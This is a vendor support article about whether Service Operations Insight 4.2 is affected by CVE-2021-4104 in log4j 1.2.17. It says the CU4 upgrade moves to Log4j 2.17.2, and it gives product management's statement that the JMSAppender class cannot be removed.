SOI 4.2 CU2 is using log4j 1.2.17 which is affected by CVE-2021-4104
 
https://support.broadcom.com/external/content/security-advisory/Broadcom-Enterprise-Software-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/19792
 
The deletion of the JMSAppender class seems to be a general recommendation from other products.
 
Can the class be disabled in SOI as well or will it lead to errors?

Release : 4.2

Component : Service Operations Insight (SOI) Manager

SOI 4.2 CU4 removes the old log4j 1.x versions and replaces them with Log4j 2.17.2.  You can find this documented as a new feature in the release notes for SOI 4.2 CU4:

Log4j 2.17.2 Certification
Log4j library version is upgraded to 2.17.2 to fix the security vulnerabilities.
Any updates to the log configurations (log4j.properties, log4j.xml) made before SOI 4.2 CU4 are not retained. The Log4j configuration files are chaged and now use the log4j2.xml files for configuration.

SOI 4.2 CU4

Official statement from SOI product management:

SOI is not impacted with this JMSAppender vulnerability (reported on log4j 1.x) out of the box because we extended a few classes from this JMSAppender class and are using a different configuration file to load the configuration.

So the attacker needs to have access to this configuration file to exploit this vulnerability, without which it cannot be exploited

The JMSAppender class from the log4j libraries cannot/ should not be removed, as it will impact the functioning of SOI because we have extended this class.